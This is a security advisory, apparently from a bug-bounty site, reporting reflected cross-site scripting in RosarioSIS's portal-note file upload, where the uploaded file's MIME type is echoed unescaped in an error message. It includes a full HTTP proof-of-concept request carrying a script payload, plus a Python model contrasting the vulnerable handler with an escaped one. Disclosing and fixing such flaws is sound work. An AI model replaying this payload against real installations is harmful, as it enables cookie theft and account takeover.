Cross-site scripting - Reflected via mime-type file upload in francoisjacquet/rosariosis
Valid
Reported on Apr 23rd 2022
Description
When a user uploads a file whose extension is not in the whitelist, the server throws an error that includes the MIME type of the uploaded file (which the user controls) without sanitizing it.
Proof of Concept
POST /rosariosis/Modules.php?modname=School_Setup/PortalNotes.php&modfunc=update HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: */*
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------3345002182489293764621537208
Content-Length: 2444
Origin: http://localhost:8080
Connection: close
Referer: http://localhost:8080/rosariosis/Modules.php?modname=School_Setup/PortalNotes.php
Cookie: RosarioSIS=usti6etu55tb38dsu6iq78c1u5
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="values[new][TITLE]"
<h1>123</h1>
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="values[new][CONTENT]"
<h1>123</h1>

-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="values[new][SORT_ORDER]"
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="FILE_ATTACHED_FILE"; filename="aaa.php"
Content-Type: <script>alert()</script>    <-- user-controlled value, reflected unsanitized in the error message, leading to XSS
my file
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="values[new][FILE_ATTACHED_EMBED]"
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="month_values[new][START_DATE]"
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="day_values[new][START_DATE]"
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="year_values[new][START_DATE]"
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="month_values[new][END_DATE]"
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="day_values[new][END_DATE]"
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="year_values[new][END_DATE]"
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][admin]"
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][teacher]"
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][parent]"
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][0]"
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][1]"
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][2]"
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][3]"
-----------------------------3345002182489293764621537208--
PoC Image
Impact
This vulnerability allows an attacker to execute arbitrary JavaScript in the victim's browser, steal the user's cookie, etc.
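Added example, not RosarioSIS's own code, modelling the bug described above: a Python upload handler that parses a multipart body shaped like the PoC, rejects the non-whitelisted extension, and builds the error message both the vulnerable way (the client's Content-Type echoed as-is) and a safe way. The whitelist, boundary, field name and message wording are assumptions.

```python
import html
import os
from email.parser import BytesParser

ALLOWED_EXTENSIONS = {".pdf", ".png", ".jpg", ".jpeg", ".gif", ".txt"}  # assumed whitelist
BOUNDARY = "boundary123"

# Constructed multipart body modelled on the PoC: the file part's Content-Type
# is chosen by the client, so it is untrusted input like any other field.
SAMPLE_BODY = (
    "--boundary123\r\n"
    'Content-Disposition: form-data; name="FILE_ATTACHED_FILE"; filename="aaa.php"\r\n'
    "Content-Type: <script>alert()</script>\r\n"
    "\r\n"
    "my file\r\n"
    "--boundary123--\r\n"
).encode()

def parse_file_part(body: bytes, boundary: str, field: str):
    """Return (filename, raw Content-Type) of the named file part, or (None, None)."""
    # Prepending a top-level Content-Type lets the stdlib email parser walk the parts.
    head = f'Content-Type: multipart/form-data; boundary="{boundary}"\r\n\r\n'.encode()
    msg = BytesParser().parsebytes(head + body)
    for part in msg.get_payload() if msg.is_multipart() else []:
        if part.get_param("name", header="content-disposition") == field:
            # Read the raw header, not get_content_type(): the raw string is
            # what a server echoes back, and it need not be a valid MIME type.
            return part.get_filename(), part.get("Content-Type", "")
    return None, None

def upload_error_vulnerable(filename: str, mime: str) -> str:
    """The pattern the report describes: the client's MIME string is put into HTML as-is."""
    return f"Error: file type {mime} is not allowed."

def upload_error_fixed(filename: str, mime: str) -> str:
    """Name the rejected extension instead of the MIME string, and HTML-escape it,
    since a filename such as 'a.<b>' is attacker-controlled too."""
    ext = os.path.splitext(filename)[1].lower()
    return f"Error: files with extension {html.escape(ext)} are not allowed."

def handle_upload(body: bytes, fixed: bool) -> str:
    """Whitelist check on the extension; on rejection build the error either way."""
    filename, mime = parse_file_part(body, BOUNDARY, "FILE_ATTACHED_FILE")
    if not filename:
        return "Error: no file attached."
    if os.path.splitext(filename)[1].lower() in ALLOWED_EXTENSIONS:
        return "ok"
    return (upload_error_fixed if fixed else upload_error_vulnerable)(filename, mime)
```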
Nhien.IT modified the report